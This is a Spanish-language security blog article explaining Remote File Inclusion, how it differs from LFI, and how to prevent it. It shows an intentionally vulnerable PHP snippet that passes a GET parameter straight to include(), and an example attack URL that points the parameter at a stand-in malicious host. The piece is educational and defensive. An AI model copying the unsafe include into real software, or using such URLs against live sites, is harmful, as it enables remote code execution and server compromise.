La frase 'REMOTE FILE INCLUSION (RFI): EXPLICACIÓN' superpuesta sobre un fondo de código informático, ilustrando la vulnerabilidad de seguridad web.
¿Qué es RFI? Descubre esta crítica vulnerabilidad web y cómo puede ser explotada. ¡Todo lo que necesitas saber para protegerte!
Hacking
·6 Minutos de lectura

Vulnerabilidad Remote File Inclusion (RFI): Riesgos de Inclusión de Archivos Remotos

Con el uso de la inclusión de archivos remotos o remote file inclusion (RFI), un hacker puede lograr que una aplicación web incluya un archivo remoto con fines maliciosos. Aunque no es una amenaza muy publicitada en los medios del sector, el ataque RFI tiene un gran efecto destructivo, causando desde la divulgación de datos sensibles y confidenciales hasta la ejecución de códigos remotos, provocando el total compromiso del sistema.

De hecho, el RFI puede ser tan dañino como los ataques XSS (cross-site scripting) e inyección SQL, y apunta a plataformas muy populares como WordPress. A continuación, ¡aprende más sobre esta ciberamenaza y cómo prevenirla y mitigar el problema!

Tabla de Contenido

¿Qué es un ataque Remote File Inclusion o RFI?

El ataque RFI o inclusión de archivos remotos es una ciberamenaza que aprovecha la vulnerabilidad de una aplicación web (la falta de validación de la entrada de datos proporcionados por el usuario) para insertar un archivo remoto. Para ello, las aplicaciones web necesitan ser capaces de incluir dinámicamente archivos o scripts externos.

De esta manera, cuando el código insertado por el atacante se ejecuta en el servidor web, es posible ejercer acciones cibercriminales.

Diagrama que ilustra la vulnerabilidad RFI (Remote File Inclusion) en una aplicación web, mostrando cómo un atacante inyecta un payload remoto en el servidor.
Entiende la peligrosa vulnerabilidad RFI. Aprende a proteger tus aplicaciones web contra la inyección de archivos remotos.

Aquí, el objetivo de los hackers es explorar la función de referencia en la aplicación para subir malware (código malicioso) desde una URL remota ubicada en un dominio diferente. El robo de datos, el compromiso de servidores y la dominación del sitio para la manipulación de contenido son consecuencias comunes de un ataque RFI exitoso.

Ataque RFI: ¿cómo funciona la inclusión de archivos remotos?

Para ejemplificar, el esquema típico de un ataque Remote File Inclusion o RFI funciona de la siguiente manera:

  • El cibercriminal utiliza un motor de búsqueda o escáner para detectar un sitio web con componentes vulnerables;
  • Los atacantes aprovechan la vulnerabilidad RFI (inclusión de archivos remotos) para subir un malware o código malicioso;
  • El sitio se ve comprometido con la instalación del malware (las páginas se alteran o se eliminan). Luego, el servidor es secuestrado y utilizado como un bot (robot) de DDoS: muchos otros sitios se ven comprometidos. Finalmente, los datos se ven afectados, con robo de contraseñas e información.

En otras palabras, los atacantes primero rastrearán para identificar elementos vulnerables en un sitio web en base a su URL. Por ejemplo:

www.ejemplo.com/index.php?page=PageName

El siguiente es un ejemplo de código PHP con una vulnerabilidad de inclusión remota de archivos. Se puede incluir un archivo con código fuente, lo que resulta en la ejecución de código arbitrario.

/**
* Obtener el nombre del archivo de una entrada GET
* Ejemplo - http://ejemplo.com/?file=index.php
*/
$file = $_GET['file'];

/**
* Incluir el archivo de forma insegura
* Ejemplo - index.php
*/
include($file);

A partir de este sitio web, el hacker inserta un enlace que contiene un código malicioso, tal como:

www.ejemplo.com/index.php?page=http://www.ataque.com/archivo-malicioso.php

Si el sitio web tiene una vulnerabilidad RFI, el código malicioso se ejecutará y se abrirá el enlace remoto; con esto, los cibercriminales pueden continuar con el ataque.

¿Cuál es la diferencia entre un ataque RFI y LFI?

¿Has oído hablar del LFI o inclusión de archivos locales (local file inclusion)? Cuando se trata del ataque RFI, hay una confusión común entre los dos términos.

Vamos allá: de forma similar al RFI, el LFI es un vector que también implica la subida de archivos maliciosos a servidores a través de navegadores. No por casualidad, ambos vectores se citan frecuentemente en el contexto de ataques de inclusión de archivos.

En ambos casos, un ataque exitoso resulta en la subida de un malware al servidor objetivo. Sin embargo, a diferencia del RFI, el LFI tiene como objetivo explorar las funciones inseguras de subida de archivos locales que fallan al validar la entrada controlada por el usuario.

Con esto, los hackers pueden enviar el malware directamente a un servidor comprometido, en lugar de recuperarlo al usar una función de referencia externa de una ubicación remota.

¿Cómo prevenir y mitigar el ataque Remote File Inclusion?

Para prevenir el ataque RFI, un primer paso básico y esencial es definir reglas de validación en los archivos externos, es decir, eliminar la vulnerabilidad. En este caso, lo ideal es no permitir la entrada de archivos externos al sistema a través de las brechas. Se trata, por lo tanto, de garantizar la validación de todos los archivos.

Es importante tener en cuenta, sin embargo, que este cuidado no asegura la protección completa contra la acción del hacker. Aunque la limpieza de entrada PHP y la correcta gestión de archivos minimizan los riesgos del RFI (y son de hecho necesarios), estas prácticas, por sí solas, no son suficientes.

Cabe añadir, además, que muchas veces los ciberataques se deben precisamente a la sensación de “falsa seguridad”, que termina poniendo en riesgo los sistemas y aplicaciones de las empresas.

En este sentido, la defensa más eficaz contra el ataque RFI y también el LFI son los firewalls que filtran los parámetros de entrada de los sitios web contra posibles inclusiones de archivos. Es el caso de las soluciones de WAF en la nube, que pueden bloquear intentos maliciosos relacionados con la inserción de archivos basados en intentos de ataque anteriores, haciendo inviables cualquier amenaza futura que se origine de la misma fuente.

Existen, además, soluciones avanzadas de WAF en la nube que también ofrecen protección contra amenazas de día cero. Para ello, se utiliza un monitoreo inteligente del tráfico, detectando y bloqueando los ataques antes de que puedan afectar a la aplicación web.

Y entonces, ¿aclaró tus dudas sobre el ataque RFI (Remote File Inclusion) y sus riesgos? Mantenerte al tanto de las diferentes ciberamenazas es crucial para invertir en la protección adecuada y mantener la integridad de los datos y la continuidad de las operaciones de cualquier empresa. ¡Anótate a nuestro boletín gratuito!

Video Explicativo de Vulnerabilidad Remote File Inclusion

Preguntas frecuentes

¿Qué es la inclusión remota de archivos (RFI)?

La inclusión remota de archivos (RFI) es una vulnerabilidad web grave. Si existe una vulnerabilidad RFI en un sitio web o una aplicación web, un atacante puede incluir archivos externos maliciosos que luego son ejecutados por este sitio web o aplicación web.

¿Qué tan peligrosa es la RFI?

La RFI puede ser muy peligrosa. Las consecuencias potenciales van desde la divulgación de información confidencial y el scripting entre sitios (XSS) hasta la ejecución remota de código (inyección de código) y, como resultado final, la completa vulneración del sistema.

¿Cómo detectar RFI?

La forma más eficiente de detectar RFI es utilizando un escáner de vulnerabilidades automatizado. Por supuesto, puede detectar tales vulnerabilidades a través de pruebas de penetración manuales, pero requiere mucho más tiempo y recursos.

¿Cómo evitar RFI?

Para evitar RFI y muchas otras vulnerabilidades, nunca confíes en la entrada del usuario. Si necesitas incluir archivos en el código de tu sitio web o aplicación web, utiliza una lista blanca de nombres y ubicaciones de archivos permitidos.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda